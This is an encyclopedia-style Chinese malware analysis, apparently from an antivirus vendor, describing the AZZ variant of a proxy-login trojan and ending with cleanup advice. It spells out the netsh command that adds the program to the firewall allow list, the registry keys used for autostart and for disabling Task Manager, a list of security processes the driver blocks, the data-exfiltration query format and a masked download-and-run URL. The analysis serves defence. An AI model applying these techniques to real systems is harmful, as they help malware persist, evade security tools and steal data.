代理登入器變種AZZ病毒

該病毒是木馬病毒。病毒運行後會在系統目錄下建立檔案名稱為:kernelwind32.exe、kernelw.sys的病毒檔案,通過載入非法服務,並試圖關閉多種防毒軟體。該病毒可以修改系統註冊表,實現隨系統自啟動,同時病毒將自身隱藏起來而不能被發現。病毒禁用任務管理器,可以收集用戶電腦的信息並傳送到黑客指定的網站,還能夠連線到黑客指定的網站上下載新的病毒。

基本介紹

  • 中文名:代理登入器變種AZZ病毒
  • 清除方法:安裝瑞星防毒軟體
  • 特點:可以修改系統註冊表
  • 檔案名稱:kernelw.sys
此程式為DL類型程式 1、病毒運行後,會把自己複製到%system32%目錄下,檔案名稱為:kernelwind32.exe。並釋放一個驅動程式:檔案名稱為:kernelw.sys。
(1)kernelwind32.exe是病毒本身。
(2)Kernelw.sys是一個惡意的驅動程式,當該驅動被載入後,會禁止以下程式載入或運行:vsdatant.sys,watchdog.sys,zclient.exe,bcfilter.sys,bcftdi.sys,bc_hassh_f.sys,bc_ip_f.sys,bc_ngn.sys,bc_pat_f.sys,bc_prt_f.sys,bc_tdi_f.sys,filtnt.sys,sandbox.sys,mpfirewall.sys,msssrv.exe,mcshield.exe,fsbl.exe,avz.exe,avp.exe,avpm.exe,kav.exe,kavss.exe,kavsvc.exe,klswd.exe,ccapp.exe,ccevtmgr.exe,ccpxysvc.exe,iao.exe,issvc.exe,rtvscan.exe,savscan.exe,bdss.exebdmcon.exelivesrv.execclaw.exe,fsav32.exe,fsm32.exe,gcasserv.exe,icmon.exe,inetupd.exe,nod32krn.exe,nod32ra.exe,pavfnsvr.exe,Windows-KB890830-V1.32.exe。
(3)驅動程式HOOK了ZwQueryDirectoryFile,ZwEnumerateValueKey使用戶在我的電腦中,無法查看到檔案名稱、註冊表、進程中含有kernelw字元串的檔案。
2、繞過Windows自帶防火牆
病毒利用windows的netsh命令在不經過用戶允許的情況下強制把自己加入到Windows防火牆的可用列表中,這樣當病毒運行後,要連線主機要下載檔案時,Windows防火牆就會自動放過病毒程式。
病毒用netsh的以下命令行繞過Windows自帶防火牆:netsh firewall set allowedprogram VirusName enable。運行後,病毒等待3秒時間,讓以上程式執行。
3、3秒以後病毒會修改註冊表項,為病毒以後啟動作些準備。
(1)增加啟動項,當系統在次啟動後,病毒也隨系統一起運行:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"System" = C:\WINDOWS\system32\kernelwind32.exe
(2)禁用任務管理器,當用CTRL+ALT+DELETE後,會出現任務管理被禁用的提示。
HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\policies\system
"disabletaskmgr" = 0x00000001
(3)增加病毒的驅動程式服務
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Driver
(ImagePath)\??\C:\WINDOWS\system32\kernelw.sys
4、病毒會收集一些本機的信息以以下的方式傳送會指定的網站:
病毒會收集本機的作業系統信息如:作業系統版本、CPU類型、哪個國家的語言等。
病毒傳送的方式如下:
adv/010/adload.php?
a1=People's Republic of China&
a2=Type of Processor: PENTIUM PRO or PENTIUM II/III&
a3=Windows version is 5.1&
a4=Build: 2600, Platform ID: 2&
a5=notoutpost&table=adv10
5、下載檔案並生成檔案運行:
病毒會從http://XXXX..net/32647543ygwvrhbjt3h4evjrbgnrt.php?adv=10&code1= LN0H&code2=5150下載檔案並運行下載後的程式。
安全建議:
1 安裝正版防毒軟體、個人防火牆和卡卡上網安全助手,並及時升級,瑞星防毒軟體每天至少升級三次。
2 使用“瑞星系統安全漏洞掃描”,打好補丁,彌補系統漏洞
3 不瀏覽不良網站,不隨意下載安裝可疑外掛程式。
4 不接收QQ、MSN、Emial等傳來的可疑檔案。
5 上網時打開防毒軟體實時監控功能。
6 把網銀、網遊、QQ等重要軟體加入到“瑞星帳號保險柜”中,可以有效保護密碼安全。
清除辦法:
瑞星防毒軟體清除辦法:
安裝瑞星防毒軟體,升級到19.46.61版以上,對電腦進行全盤掃描,按照軟體提示進行操作,即可徹底查殺。

相關詞條

熱門詞條

聯絡我們